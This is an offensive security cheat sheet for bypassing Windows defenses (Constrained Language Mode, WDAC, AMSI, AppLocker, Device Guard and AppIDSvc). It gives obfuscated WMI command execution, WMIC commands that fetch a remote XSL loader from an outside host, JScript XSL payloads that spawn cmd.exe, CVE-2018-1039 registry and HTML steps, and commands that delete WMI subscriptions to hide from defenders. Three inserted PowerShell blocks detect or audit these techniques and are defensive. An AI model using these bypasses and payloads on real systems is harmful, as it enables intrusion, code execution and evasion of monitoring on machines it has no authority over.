Defenses-Evasion-Cheat-Sheet
***********************************************************************************************
Useful Resources
***********************************************************************************************
Useful tools for restricted environment evasion:
https://github.com/Cn33liz/p0wnedLoader
https://rastamouse.me/2018/05/csharp-dotnettojscript-xsl/
https://github.com/Arno0x/PowerShellScripts
https://github.com/cobbr/PSAmsi/wiki/Introduction-To-PSAmsi
https://github.com/secabstraction/WmiSploit
More:
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
https://oddvar.moe/
https://www.fortynorthsecurity.com/building-a-windows-defender-application-control-lab/
https://posts.specterops.io/threat-detection-using-windows-defender-application-control-device-guard-in-audit-mode-602b48cd1c11
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-windows-defender-exploit-guard
http://www.exploit-monday.com/2018/06/device-guard-and-application.html
https://lolbas-project.github.io/#
https://www.contextis.com/en/blog/amsi-bypass
***********************************************************************************************
Evade Detection and/or Restricted Environments
***********************************************************************************************
WMI class derivation (evasion): the derived class carries no "Win32_" prefix:
$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('MyEvilProcess')
$N.Put()
Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe
Advanced WMI class derivation, presented at the Security BSides Dublin 2019 talk.
[+] Full details https://github.com/kmkz/PowerShell/tree/master/BsidesDublin-2019
# RandomName function:
function GenerateRandomName(){
$Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay()
$rSVdssS1=""
1..10 | ForEach { $rSVdssS1 += $Pf | Get-Random }
return $rSVdssS1
}
# Class derivation
zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
$CoFtfEgvsJ = [wMicLaSs]$zNrF
$YepTa = "pRoc"+"eSs"
$PoDtbeF4Dp= GenerateRandomName
$N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp")
$N.pUt()
$BlzQ=0
$VrBnZ=111-1+3+7+5+5-3+$BlzQ
$CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" # your command
# Payload execution:
iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol" # collect output (if needed)
Authenticated proxy bypass:
"Creates a TCP Tunnel through the default system proxy. As such, it automatically handles proxy authentication if ever required."
https://github.com/Arno0x/PowerShellScripts/blob/master/proxyTunnel.ps1
PowerShell without PowerShell + restricted env. escaping through WMIC XSL payload execution:
C:\Windows\System32\WMIC.exe os get /format:"https://tatamaster.lol/p0wnedLoader/p0wnedLoader.xsl"
Blue team/detection mechanisms evasion for WMI lateral movements:
(Add the following lines to your payload to remove the Windows "Application" Event Viewer logs)
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject
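The derived-class trick above works because the new class inherits Win32_Process.Create() under an arbitrary name, and the two Remove-WmiObject lines delete permanent event subscriptions. The following hunting script is an added example, not part of the original cheat sheet: it lists every class in root\cimv2 that derives from Win32_Process and every remaining permanent WMI subscription component. It assumes a default Windows install has no user-defined subclasses of Win32_Process, so any hit deserves a look.

```powershell
# Added hunting example (not from the cheat sheet). Assumption: a stock
# Windows install defines no subclasses of Win32_Process in root\cimv2.
function Find-DerivedProcessClasses {
    [CmdletBinding()]
    param([string]$Namespace = 'root/cimv2', [string]$Parent = 'Win32_Process')

    Get-CimClass -Namespace $Namespace |
        Where-Object { $_.CimSuperClassName -eq $Parent } |
        ForEach-Object {
            [pscustomobject]@{
                Namespace  = $Namespace
                ClassName  = $_.CimClassName
                SuperClass = $_.CimSuperClassName
                # A derived class inherits Create(), so it can spawn processes
                # under a name that does not start with "Win32_".
                HasCreate  = [bool]($_.CimClassMethods['Create'])
            }
        }
}

function Get-WmiSubscriptions {
    # A permanent subscription has three parts. Removing only the __EventFilter
    # (as shown above) leaves the consumer and the binding behind, so list all.
    $ns = 'root/subscription'
    foreach ($cls in '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding') {
        Get-CimInstance -Namespace $ns -ClassName $cls -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    Type  = $cls
                    # bindings have no Name; show the filter reference instead
                    Name  = if ($_.PSObject.Properties['Name']) { $_.Name } else { $_.Filter }
                    Query = $_.Query
                }
            }
    }
}

Find-DerivedProcessClasses | Format-Table -AutoSize
Get-WmiSubscriptions      | Format-Table -AutoSize
```

An orphaned __FilterToConsumerBinding or __EventConsumer with no matching filter is itself a sign that a filter was deleted.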
***********************************************************************************************
Windows Defenses Bypass
***********************************************************************************************
#####################################################
/ Testing environment /
/ Windows 10 Version:1803, O.S build 17134.523 /
#####################################################
-----------------------------------------------------
Constrained Language Mode (CLM)
-----------------------------------------------------
Identification:
In PowerShell: $ExecutionContext.SessionState.LanguageMode
Active: ConstrainedLanguage
Inactive: FullLanguage
Bypass:
1) $ExecutionContext.SessionState.LanguageMode = "FullLanguage"
2) PowerShell downgrade attack (requires PowerShell v2): "PowerShell -Version 2 -Command <...>"
PowerShell v2 advantages are:
- It does not implement AMSI;
- No PowerShell logging;
However, it is not present on either Windows 10 or Windows Server 2016.
3) wmic.exe process call create powershell.exe (usable remotely)
Resources:
P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShell
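The three bypasses above depend on the session's language mode, on the v2 engine being installed, and (for AppLocker-enforced CLM) on the Application Identity service being up. The posture check below is an added example, not code from the cheat sheet: it reports all three so an administrator can confirm the downgrade path is closed. It assumes PowerShell 5.1 (for Get-Service's StartType) and that the DISM optional-feature name MicrosoftWindowsPowerShellV2 denotes the v2 engine.

```powershell
# Added posture check (not from the cheat sheet). Assumes PowerShell 5.1.
function Get-PowerShellLockdownPosture {
    [CmdletBinding()]
    param()

    # Language mode of this session; ConstrainedLanguage means CLM is active.
    $mode = $ExecutionContext.SessionState.LanguageMode

    # Ask the v2 engine for its own version. If the engine is missing,
    # powershell.exe prints an error instead, so the output will not be "2".
    $out = & "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" `
        -NoProfile -NonInteractive -Version 2 `
        -Command '$PSVersionTable.PSVersion.Major' 2>$null
    $v2Starts = ("$out".Trim() -eq '2')

    # Optional-feature state of the v2 engine (needs elevation to query).
    $v2Feature = 'unknown (run elevated)'
    try {
        $v2Feature = (Get-WindowsOptionalFeature -Online `
            -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction Stop).State
    } catch { }

    # AppLocker cannot enforce rules when this service is stopped.
    $svc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue

    [pscustomobject]@{
        LanguageMode      = "$mode"
        V2EngineStarts    = $v2Starts
        V2OptionalFeature = "$v2Feature"
        AppIDSvcStatus    = if ($svc) { "$($svc.Status)" }    else { 'not found' }
        AppIDSvcStartType = if ($svc) { "$($svc.StartType)" } else { 'not found' }
    }
}

Get-PowerShellLockdownPosture | Format-List
```

A hardened host shows LanguageMode ConstrainedLanguage, V2EngineStarts False, V2OptionalFeature Disabled, and AppIDSvc Running with StartType Automatic.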
----------------------------------------------------------------------
Windows Defender Application Control (WDAC)
----------------------------------------------------------------------
Identification:
Configuration file location: %systemroot%\schemas\CodeIntegrity\ExamplePolicies\*.xml
Default configuration file: %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml
Bypass:
- CVE-2018-8492 (WDAC Bypass via COM XSLT):
1) Find available COM objects:
$ErrorActionPreference = "SilentlyContinue"
$ids = gwmi Win32_COMSetting | ?{ $_.ProgId -ne $null }
$ids | ForEach {if (new-object -com $_.ProgID){$_.ProgID}}
- WDAC using default policy:
2) Store payload in XML file:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
3) Execute following PowerShell code:
$xsl = new-object -ComObject Microsoft.XMLDOM.1.0
$xsl.load("c:\path\to\minimalist.xml")
$xsl.transformNode($xsl)
Resources:
CVE-2018-8492: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
COM security: https://docs.microsoft.com/en-us/windows/desktop/com/security-in-com
-----------------------------------------------------
Antimalware Scan Interface (AMSI)
-----------------------------------------------------
Identification (for ScanBuffer):
In a PowerShell terminal, enter “AmsiScanBuffer” (with double quotes)
Bypasses:
https://github.com/kmkz/PowerShell/blob/master/amsi-bypass.ps1
Resources:
https://www.contextis.com/en/blog/amsi-bypass
https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/ (most recent techniques)
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
----------------------------------------
AppLocker demystification
----------------------------------------
"When whitelisting policies are enforced, PowerShell CLM is applied in AppLocker (for users in "Allowed Mode") and WDAC (for users and administrators)."
Error message: "This app has been blocked by your system Administrator"
Bypass:
1) use p0wnedShell delivered through an .xsl file with encryption (for Defender bypass); see https://github.com/Cn33liz/p0wnedLoader for the WMI payload delivery
Example: C:\Windows\System32\wbem\WMIC.exe os get /format:"https://tatamaster/p0wnedLoader.xsl"
2) https://github.com/kmkz/PowerShell/blob/master/Semi-interactive-shell-applocker-bypass.ps1
Resources:
P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShell
AAronLocker: https://blogs.msdn.microsoft.com/aaron_margosis/2018/06/26/announcing-application-whitelisting-with-aaronlocker/
https://www.slideshare.net/OddvarHlandMoe/appolockalypse-now
https://github.com/api0cradle/UltimateAppLockerByPassList
---------------------------------------------------------------------------------------------------------------------------------------------------
Windows Lockdown Policy (WLDP aka Device Guard) with User Mode Code Integrity (UMCI) policy
---------------------------------------------------------------------------------------------------------------------------------------------------
Definition:
When CLM is "enforced" through an AppLocker policy, COM object instantiation is left very open.
In essence, nearly any COM object can be instantiated by default when WLDP is not active.
Under WDAC with UMCI, WLDP greatly reduces this number (to between 8 and 50 COM objects, according to James Forshaw of Google Project Zero in the .NET COM instantiation UMCI bypass disclosure write-up linked in the "Resources" part).
Bypass based on CVE-2018-1039 by Google Project Zero:
1) Create a "keys.txt" file with the following content:
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}
= REG_SZ WScript.Shell
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\TreatAs
= REG_SZ {72C24DD5-D70A-438B-8A42-98424B88AFB8}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}
2) From the explorer Run dialog execute “regini path\to\keys.txt”
3) Create a "shell.html" file with the following content (the payload):
<html>
<body>
<object id="obj" classid="clsid:70B46225-C474-4852-BB81-48E0D36F9A5A">NO OBJECT</object>
<script>
try {
obj.Exec("notepad");
} catch (e) {
alert(e.message);
}
</script>
</body>
</html>
4) Execute the HTML file from the Run dialog using "hh.exe path\to\shell.html"
Resources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1514 (fixed on 5/08/2018)
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1039
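The regini step above plants a per-user CLSID whose TreatAs subkey redirects to another class and marks it safe for scripting via Implemented Categories. The script below is an added detection example, not part of the original page: it walks HKCU\Software\Classes\CLSID and reports every per-user registration with a TreatAs redirect, resolving the target's display name from HKCR. It assumes, as a baseline, that per-user TreatAs redirections are rare on a managed host, so each hit should be reviewed.

```powershell
# Added detection example (not from the cheat sheet). Assumption: per-user
# TreatAs redirects are rare in normal use, so every result merits review.
function Find-UserTreatAsRedirects {
    [CmdletBinding()]
    param()

    $root = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $root)) { return }

    # CATID_SafeForScripting / CATID_SafeForInitializing, as used on this page
    $safeScript = 'Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    $safeInit   = 'Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

    Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
        $treatAs = Join-Path $_.PSPath 'TreatAs'
        if (-not (Test-Path $treatAs)) { return }

        $target = (Get-ItemProperty -Path $treatAs -ErrorAction SilentlyContinue).'(default)'

        # Resolve the redirect target through the merged HKCR view.
        $targetName = $null
        if ($target) {
            $targetName = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$target" `
                -ErrorAction SilentlyContinue).'(default)'
        }

        [pscustomobject]@{
            Clsid              = $_.PSChildName
            DisplayName        = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).'(default)'
            TreatAs            = $target
            TreatAsName        = $targetName
            SafeForScripting   = Test-Path (Join-Path $_.PSPath $safeScript)
            SafeForInitializing = Test-Path (Join-Path $_.PSPath $safeInit)
        }
    }
}

Find-UserTreatAsRedirects | Format-Table -AutoSize
```

A per-user CLSID that is both redirected with TreatAs and marked safe for scripting matches the pattern of the bypass above and of COM hijacking in general.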
-----------------------------------------------------------------------------------
Application Identity Service (Process name: AppIDSvc)
-----------------------------------------------------------------------------------
Definition:
The Application Identity service determines and verifies the identity of an app.
Stopping this service will prevent AppLocker policies from being enforced.
Important:
When using Group Policy, you must configure it to start automatically in at least one Group Policy Object (GPO) that applies AppLocker rules.
This is because AppLocker uses this service to verify the attributes of a file.
Identification:
Get-Service appidsvc
Bypass through COM object technique:
1) Store the payload in an XML file:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
2) Use "COM" object to execute payload:
$xsl = new-object -ComObject Msxml2.DOMDocument.6.0
$xsl.load("C:\Users\Victim\Documents\minimalist.xml") | out-null
$xsl.setProperty("AllowXsltScript",$true)
$xsl.transformNode($xsl)